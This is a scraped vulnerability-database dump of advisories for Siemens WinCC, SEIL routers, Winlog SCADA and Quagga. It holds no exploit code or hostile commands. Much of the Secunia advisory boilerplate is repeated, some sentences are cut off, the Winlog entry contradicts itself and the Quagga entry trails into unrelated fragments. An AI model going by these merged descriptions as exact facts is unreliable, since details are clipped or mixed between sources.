VARIoT IoT vulnerabilities database

Open redirect vulnerability in an unspecified web application in Siemens WinCC 7.0 SP3 before Update 2 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in a GET request. WinCC flexible is a human-machine interface for use in some machine or process applications. Siemens SIMATIC WinCC Flexible does not filter out specially crafted characters when parsing URL parameters, and there is a security hole in implementation. An attacker could exploit a vulnerability to redirect a user to a malicious site. Siemens SIMATIC WinCC Flexible is prone to multiple security vulnerabilities. Attackers can exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, execute arbitrary code in the context of the affected application, read arbitrary files on the system, redirect users to a potentially malicious site, access or modify data of an XML document, or cause denial-of-service conditions; other attacks may also be possible. The vulnerability is caused due to an input sanitisation error within the DiagAgent web server and can be exploited to cause a buffer overflow and crash the DiagAgent. Successful exploitation requires the DiagAgent web server to be enabled (disabled by default). ---------------------------------------------------------------------- Become a PSI 3.0 beta tester! Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface. Download it here! http://secunia.com/psi_30_beta_launch ---------------------------------------------------------------------- TITLE: Siemens SIMATIC WinCC Multiple Vulnerabilities SECUNIA ADVISORY ID: SA49341 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/49341/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=49341 RELEASE DATE: 2012-06-07 DISCUSS ADVISORY: http://secunia.com/advisories/49341/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/49341/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=49341 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: A weakness and some vulnerabilities have been reported in Siemens SIMATIC WinCC, which can be exploited by malicious users to disclose potentially sensitive information and system information and manipulate certain data and by malicious people to conduct spoofing and cross-site scripting attacks. 1) Certain input passed via URL parameters to two unspecified web applications is not properly sanitised before being used to construct a XPath query for XML data. This can be exploited to manipulate XPath queries by injecting arbitrary XPath code and e.g. read or write certain system settings. 2) Certain input passed via a filename to two unspecified web applications is not properly verified before being used to display files. This can be exploited to disclose the contents of arbitrary files via directory traversal sequences. 3) Certain input passed to two unspecified web applications is not properly sanitised before being returned to the user. 4) Certain input is not properly verified before being used to redirect users. when a user clicks a specially crafted link to the affected script hosted on a trusted domain. The weakness and the vulnerabilities are reported in version 7.0 SP3. SOLUTION: Apply "Update 2" (please see the vendor's advisory for details). PROVIDED AND/OR DISCOVERED BY: 1-3) The vendor credits Gleb Gritsai, Alexander Zaitsev, Sergey Scherbel, Yuri Goltsev, Dmitry Serebryannikov, Sergey Bobrov, Denis Baranov, and Andrey Medov, Positive Technologies. 4) Reported by the vendor. ORIGINAL ADVISORY: Siemens: http://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-223158.pdf ICS-CERT: http://www.us-cert.gov/control_systems/pdf/ICSA-12-158-01.pdf OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Multiple cross-site scripting (XSS) vulnerabilities in unspecified web applications in Siemens WinCC 7.0 SP3 before Update 2 allow remote attackers to inject arbitrary web script or HTML via vectors involving special characters in parameters. WinCC flexible is a human-machine interface for use in some machine or process applications. Siemens SIMATIC WinCC Flexible is prone to multiple security vulnerabilities. Attackers can exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, execute arbitrary code in the context of the affected application, read arbitrary files on the system, redirect users to a potentially malicious site, access or modify data of an XML document, or cause denial-of-service conditions; other attacks may also be possible. The vulnerability is caused due to an input sanitisation error within the DiagAgent web server and can be exploited to cause a buffer overflow and crash the DiagAgent. Successful exploitation requires the DiagAgent web server to be enabled (disabled by default). ---------------------------------------------------------------------- Become a PSI 3.0 beta tester! Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface. Download it here! http://secunia.com/psi_30_beta_launch ---------------------------------------------------------------------- TITLE: Siemens SIMATIC WinCC Multiple Vulnerabilities SECUNIA ADVISORY ID: SA49341 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/49341/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=49341 RELEASE DATE: 2012-06-07 DISCUSS ADVISORY: http://secunia.com/advisories/49341/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/49341/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=49341 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: A weakness and some vulnerabilities have been reported in Siemens SIMATIC WinCC, which can be exploited by malicious users to disclose potentially sensitive information and system information and manipulate certain data and by malicious people to conduct spoofing and cross-site scripting attacks. 1) Certain input passed via URL parameters to two unspecified web applications is not properly sanitised before being used to construct a XPath query for XML data. This can be exploited to manipulate XPath queries by injecting arbitrary XPath code and e.g. read or write certain system settings. 2) Certain input passed via a filename to two unspecified web applications is not properly verified before being used to display files. This can be exploited to disclose the contents of arbitrary files via directory traversal sequences. 3) Certain input passed to two unspecified web applications is not properly sanitised before being returned to the user. 4) Certain input is not properly verified before being used to redirect users. This can be exploited to redirect a user to an arbitrary website e.g. when a user clicks a specially crafted link to the affected script hosted on a trusted domain. The weakness and the vulnerabilities are reported in version 7.0 SP3. SOLUTION: Apply "Update 2" (please see the vendor's advisory for details). PROVIDED AND/OR DISCOVERED BY: 1-3) The vendor credits Gleb Gritsai, Alexander Zaitsev, Sergey Scherbel, Yuri Goltsev, Dmitry Serebryannikov, Sergey Bobrov, Denis Baranov, and Andrey Medov, Positive Technologies. 4) Reported by the vendor. ORIGINAL ADVISORY: Siemens: http://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-223158.pdf ICS-CERT: http://www.us-cert.gov/control_systems/pdf/ICSA-12-158-01.pdf OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Multiple SEIL products are prone to a security-bypass vulnerability. An attacker can exploit this issue to bypass the security mechanisms built into an affected device. This may aid in further attacks. Note: Successful exploitation requires HTTP-Proxy is set and 'Application-Gateway' is enabled. The following products are vulnerable: SEIL/x86 1.00 through 2.35 SEIL/X1 2.30 through 3.75 SEIL/X2 2.30 through 3.75 SEIL/B1 2.30 through 3.75

SEIL routers with firmware SEIL/x86 1.00 through 2.35, SEIL/X1 2.30 through 3.75, SEIL/X2 2.30 through 3.75, and SEIL/B1 2.30 through 3.75, when the http-proxy and application-gateway features are enabled, do not properly handle the CONNECT command, which allows remote attackers to bypass intended URL restrictions via a TCP session. SEIL series contain an issue where access permissions are not restricted. SEIL series are wireless LAN routers. SEIL series contain an issue where access permissions are not restricted.An attacker that can access the product's HTTP proxy may bypass restrictions such as the URL filter. The SEIL Router is a router from Japan's SEIL vendors. A security vulnerability exists in the SEIL Router that allows malicious users to bypass some security restrictions. There is an error in the HTTP-Proxy/Gateway function provided by the router. To successfully exploit the vulnerability, you need to set HTTP-Proxy and enable \"Application-Gateway\". SEIL routers are routers produced by SEIL manufacturers in Japan. A successful attack requires setting up an HTTP proxy and enabling an "Application Gateway". ---------------------------------------------------------------------- Become a PSI 3.0 beta tester! Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface. Download it here! http://secunia.com/psi_30_beta_launch ---------------------------------------------------------------------- TITLE: SEIL Routers HTTP-Proxy/Gateway Functionality Security Bypass Vulnerability SECUNIA ADVISORY ID: SA49365 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/49365/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=49365 RELEASE DATE: 2012-06-06 DISCUSS ADVISORY: http://secunia.com/advisories/49365/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/49365/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=49365 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: A vulnerability has been reported in SEIL routers, which can be exploited by malicious people to bypass certain security restrictions. The vulnerability is caused due to an error within the HTTP-Proxy/Gateway functionality and can be exploited to e.g. The vulnerability is reported in the following products and versions: * SEIL/x86 firmware versions 1.00 through 2.35. * SEIL/X1 firmware versions 2.30 through 3.75. * SEIL/X2 firmware versions 2.30 through 3.75. * SEIL/B1 firmware versions 2.30 through 3.75. SOLUTION: Update to a fixed version. Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: SEIL: http://www.seil.jp/support/security/a01232.html OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Multiple directory traversal vulnerabilities in Siemens WinCC 7.0 SP3 before Update 2 allow remote authenticated users to read arbitrary files via a crafted parameter in a URL. WinCC flexible is a human-machine interface for use in some machine or process applications. An attacker can exploit the vulnerability to read arbitrary files. Siemens SIMATIC WinCC Flexible is prone to multiple security vulnerabilities. Attackers can exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, execute arbitrary code in the context of the affected application, read arbitrary files on the system, redirect users to a potentially malicious site, access or modify data of an XML document, or cause denial-of-service conditions; other attacks may also be possible. The vulnerability is caused due to an input sanitisation error within the DiagAgent web server and can be exploited to cause a buffer overflow and crash the DiagAgent. Successful exploitation requires the DiagAgent web server to be enabled (disabled by default). ---------------------------------------------------------------------- Become a PSI 3.0 beta tester! Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface. Download it here! http://secunia.com/psi_30_beta_launch ---------------------------------------------------------------------- TITLE: Siemens SIMATIC WinCC Multiple Vulnerabilities SECUNIA ADVISORY ID: SA49341 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/49341/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=49341 RELEASE DATE: 2012-06-07 DISCUSS ADVISORY: http://secunia.com/advisories/49341/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/49341/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=49341 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: A weakness and some vulnerabilities have been reported in Siemens SIMATIC WinCC, which can be exploited by malicious users to disclose potentially sensitive information and system information and manipulate certain data and by malicious people to conduct spoofing and cross-site scripting attacks. 1) Certain input passed via URL parameters to two unspecified web applications is not properly sanitised before being used to construct a XPath query for XML data. This can be exploited to manipulate XPath queries by injecting arbitrary XPath code and e.g. read or write certain system settings. 2) Certain input passed via a filename to two unspecified web applications is not properly verified before being used to display files. This can be exploited to disclose the contents of arbitrary files via directory traversal sequences. 3) Certain input passed to two unspecified web applications is not properly sanitised before being returned to the user. 4) Certain input is not properly verified before being used to redirect users. This can be exploited to redirect a user to an arbitrary website e.g. when a user clicks a specially crafted link to the affected script hosted on a trusted domain. The weakness and the vulnerabilities are reported in version 7.0 SP3. SOLUTION: Apply "Update 2" (please see the vendor's advisory for details). PROVIDED AND/OR DISCOVERED BY: 1-3) The vendor credits Gleb Gritsai, Alexander Zaitsev, Sergey Scherbel, Yuri Goltsev, Dmitry Serebryannikov, Sergey Bobrov, Denis Baranov, and Andrey Medov, Positive Technologies. 4) Reported by the vendor. ORIGINAL ADVISORY: Siemens: http://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-223158.pdf ICS-CERT: http://www.us-cert.gov/control_systems/pdf/ICSA-12-158-01.pdf OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Buffer overflow in the DiagAgent web server in Siemens WinCC 7.0 SP3 through Update 2 allows remote attackers to cause a denial of service (agent outage) via crafted input. WinCC flexible is a human-machine interface for use in some machine or process applications. Siemens SIMATIC WinCC Flexible does not filter out specially crafted characters when parsing URL parameters, and there is a buffer overflow vulnerability in implementation. An attacker could exploit the vulnerability to cause a denial of service. Siemens SIMATIC WinCC Flexible is prone to multiple security vulnerabilities. Attackers can exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, execute arbitrary code in the context of the affected application, read arbitrary files on the system, redirect users to a potentially malicious site, access or modify data of an XML document, or cause denial-of-service conditions; other attacks may also be possible. Successful exploitation requires the DiagAgent web server to be enabled (disabled by default). ---------------------------------------------------------------------- Become a PSI 3.0 beta tester! Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface. Download it here! http://secunia.com/psi_30_beta_launch ---------------------------------------------------------------------- TITLE: Siemens SIMATIC WinCC Multiple Vulnerabilities SECUNIA ADVISORY ID: SA49341 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/49341/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=49341 RELEASE DATE: 2012-06-07 DISCUSS ADVISORY: http://secunia.com/advisories/49341/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/49341/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=49341 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: A weakness and some vulnerabilities have been reported in Siemens SIMATIC WinCC, which can be exploited by malicious users to disclose potentially sensitive information and system information and manipulate certain data and by malicious people to conduct spoofing and cross-site scripting attacks. 1) Certain input passed via URL parameters to two unspecified web applications is not properly sanitised before being used to construct a XPath query for XML data. This can be exploited to manipulate XPath queries by injecting arbitrary XPath code and e.g. read or write certain system settings. 2) Certain input passed via a filename to two unspecified web applications is not properly verified before being used to display files. This can be exploited to disclose the contents of arbitrary files via directory traversal sequences. 3) Certain input passed to two unspecified web applications is not properly sanitised before being returned to the user. 4) Certain input is not properly verified before being used to redirect users. This can be exploited to redirect a user to an arbitrary website e.g. when a user clicks a specially crafted link to the affected script hosted on a trusted domain. The weakness and the vulnerabilities are reported in version 7.0 SP3. SOLUTION: Apply "Update 2" (please see the vendor's advisory for details). PROVIDED AND/OR DISCOVERED BY: 1-3) The vendor credits Gleb Gritsai, Alexander Zaitsev, Sergey Scherbel, Yuri Goltsev, Dmitry Serebryannikov, Sergey Bobrov, Denis Baranov, and Andrey Medov, Positive Technologies. 4) Reported by the vendor. ORIGINAL ADVISORY: Siemens: http://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-223158.pdf ICS-CERT: http://www.us-cert.gov/control_systems/pdf/ICSA-12-158-01.pdf OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Buffer overflow in RunTime.exe in Sielco Sistemi Winlog Pro SCADA before 2.07.18 and Winlog Lite SCADA before 2.07.18 allows remote attackers to execute arbitrary code via a crafted packet to TCP port 46824. NOTE: some of these details are obtained from third party information. SIELCO SISTEMI Winlog is an application for data acquisition and remote control of SCADA HMI monitoring software. There is a security hole in Winlog Pro/lite. Winlog Pro/lite has an input validation error. Unauthorized users can send special requests to the TCP 46824 port to access the read system files. Winlog Lite is prone to a remote buffer-overflow vulnerability. Failed exploit attempts will result in a denial-of-service condition. ---------------------------------------------------------------------- Become a PSI 3.0 beta tester! Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface. Download it here! http://secunia.com/psi_30_beta_launch ---------------------------------------------------------------------- TITLE: Winlog Packet Processing Buffer Overflow Vulnerability SECUNIA ADVISORY ID: SA49395 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/49395/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=49395 RELEASE DATE: 2012-06-06 DISCUSS ADVISORY: http://secunia.com/advisories/49395/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/49395/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=49395 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: m1k3 has discovered a vulnerability in Winlog, which can be exploited by malicious people to compromise a vulnerable system. Successful exploitation allows execution of arbitrary code, but requires a project to be configured for TCP server mode (not by default). The vulnerability is confirmed in version 2.07.14. Other versions may also be affected. SOLUTION: Restrict access to trusted hosts only. PROVIDED AND/OR DISCOVERED BY: m1k3 ORIGINAL ADVISORY: http://www.s3cur1ty.de/m1adv2012-001 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

The bgp_capability_orf function in bgpd in Quagga 0.99.20.1 and earlier allows remote attackers to cause a denial of service (assertion failure and daemon exit) by leveraging a BGP peering relationship and sending a malformed Outbound Route Filtering (ORF) capability TLV in an OPEN message. Quagga, a routing software suite, contains a BGP OPEN vulnerability that result in a denial-of-service condition. Quagga There is a service disruption (DoS) Vulnerabilities exist. Routing software Quagga Is bgp_capability_orf() By function BGP OPEN There is a problem with message processing and service operation is interrupted (DoS) Vulnerabilities exist.Service disruption by a remote third party (DoS) There is a possibility of being attacked. Exploiting this issue allows remote attackers to cause the vulnerable daemon to crash, denying further service to legitimate users. Quagga 0.99.20.1 and prior versions are vulnerable. For the stable distribution (squeeze), this problem has been fixed in version 0.99.20.1-0+squeeze3. For the testing distribution (wheezy) and the unstable distribution (sid), this problem has been fixed in version 0.99.21-3. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . ---------------------------------------------------------------------- Become a PSI 3.0 beta tester! Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface. Download it here! http://secunia.com/psi_30_beta_launch ---------------------------------------------------------------------- TITLE: Quagga "bgp_capability_orf()" Denial of Service Vulnerability SECUNIA ADVISORY ID: SA49401 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/49401/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=49401 RELEASE DATE: 2012-06-08 DISCUSS ADVISORY: http://secunia.com/advisories/49401/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/49401/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=49401 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: A vulnerability has been reported in Quagga, which can be exploited by malicious people to cause a DoS (Denial of Service). The vulnerability is caused due to an error in the "bgp_capability_orf()" function when parsing OPEN messages containing an ORF capability TLV. This can be exploited to cause a buffer overflow via a specially crafted packet. Successful exploitation requires control of a pre-configured BGP peer. SOLUTION: Restrict access to trusted BGP peers only. PROVIDED AND/OR DISCOVERED BY: US-CERT credits Denis Ovsienko. ORIGINAL ADVISORY: US-CERT: http://www.kb.cert.org/vuls/id/962587 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. ---------------------------------------------------------------------- The final version of the CSI 6.0 has been released. This fixes a vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service). - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201310-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Quagga: Multiple vulnerabilities Date: October 10, 2013 Bugs: #408507, #475706 ID: 201310-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in Quagga, the worst of which could lead to arbitrary code execution. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-misc/quagga < 0.99.22.4 >= 0.99.22.4 Description =========== Multiple vulnerabilities have been discovered in Quagga. Please review the CVE identifiers referenced below for details. Impact ====== A remote attacker may be able to cause arbitrary code execution or a Denial of Service condition. Workaround ========== There is no known workaround at this time. Resolution ========== All Quagga users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/quagga-0.99.22.4" References ========== [ 1 ] CVE-2012-0249 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0249 [ 2 ] CVE-2012-0250 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0250 [ 3 ] CVE-2012-0255 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0255 [ 4 ] CVE-2012-1820 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1820 [ 5 ] CVE-2013-2236 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2236 Availability ============ This GLSA and any 